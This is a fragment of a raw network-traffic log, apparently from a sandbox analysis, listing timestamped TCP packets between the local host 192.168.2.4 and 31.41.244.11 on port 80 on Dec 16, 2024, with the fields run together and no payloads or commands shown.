                                                                                                                                                                                              Dec 16, 2024 01:01:41.678632021 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.683398962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.683417082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.683465958 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.688219070 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.688235998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.688281059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.692950964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.692967892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.693017960 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.697752953 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.697771072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.697822094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.697822094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.702200890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.702279091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.702481031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.702552080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.706887960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.706903934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.706976891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.706976891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.711400032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.711659908 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.711694956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.711734056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.716083050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.716099977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.716157913 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.720583916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.720663071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.720720053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.725183964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.725264072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.725408077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.729839087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.729856014 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.729875088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.729911089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.729911089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.733442068 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.733459949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.733508110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.737075090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.737102032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.737154007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.740726948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.740788937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.740919113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.741559982 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.744383097 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.744426966 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.744479895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.747934103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.748049974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.748105049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.751604080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.751720905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.751785040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.755424976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.755443096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.755502939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.759047985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.759066105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.759102106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.759141922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.792711973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.792736053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.792768955 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.792808056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.794332981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.794419050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.794455051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.794487953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.898042917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.898067951 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.898133039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.899104118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.899164915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.899218082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.901050091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.901103020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.901137114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.901195049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.903562069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.903619051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.903837919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.905688047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.906100035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.906147957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.906316996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.906368017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.908657074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.908708096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.908866882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.908914089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.911186934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.911235094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.911276102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.911340952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.913654089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.913702965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.913758993 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.913805962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.916172981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.916229010 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.916285038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.916328907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.918713093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.918765068 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.918821096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.918870926 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.920594931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.920643091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.920690060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.920734882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.922451019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.922498941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.922545910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.922600985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.924320936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.924369097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.924470901 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.924520016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.926148891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.926198959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.926251888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.926297903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.927993059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.928036928 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.928112030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.928158998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.929851055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.929928064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.929974079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.930017948 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.931700945 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.931751013 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.931835890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.931881905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.933573008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.933624029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.933675051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.933722019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.935430050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.935481071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.935549974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.935600996 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.937273979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.937325954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.937361002 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.937403917 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.939141989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.939189911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.939281940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.939341068 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.940993071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.941049099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.941093922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.941139936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.942851067 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.942899942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.942953110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.943001986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.944740057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.944793940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.944828033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.944875002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.946563959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.946615934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.946799040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.946857929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.948415041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.948466063 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.948570967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.948621988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.950248957 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.950304031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.950365067 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.950417042 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.952105999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.952156067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.952200890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.952245951 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.954041004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.954098940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.954111099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.954154015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.955939054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.956001043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.956016064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.956672907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.957741022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.957796097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.957901001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.957947969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.959600925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.959659100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.959732056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.959784031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.961452961 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.961515903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.961591005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.961646080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.963362932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.963433027 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.963509083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.963562012 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.965106964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.965168953 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.090182066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.090277910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.090497971 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.090986967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.091034889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.091053009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.091079950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.092451096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.092502117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.093113899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.093174934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.093246937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.093295097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.094866991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.094919920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.095016956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.095068932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.096580982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.096645117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.096693039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.096740007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.098300934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.098345041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.098397970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.098439932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.100039959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.100100040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.100145102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.100191116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.101933002 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.101978064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.102124929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.102174044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.103504896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.103552103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.103624105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.103672981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.105273008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.105318069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.105344057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.105391026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.106998920 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.107048988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.107115984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.107163906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.108712912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.108756065 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.108809948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.108854055 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.110431910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.110491991 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.110537052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.110615969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.112171888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.112225056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.112544060 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.112593889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.113935947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.113982916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.114041090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.114082098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.115657091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.115706921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.115757942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.115802050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.117389917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.117445946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.117568970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.117621899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.119160891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.119206905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.119254112 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.119298935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.120850086 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.120901108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.120954990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.121021032 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.122591019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.122641087 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.122694969 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.122752905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.124368906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.124416113 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.124500990 CET804984831.41.244.11192.168.2.4
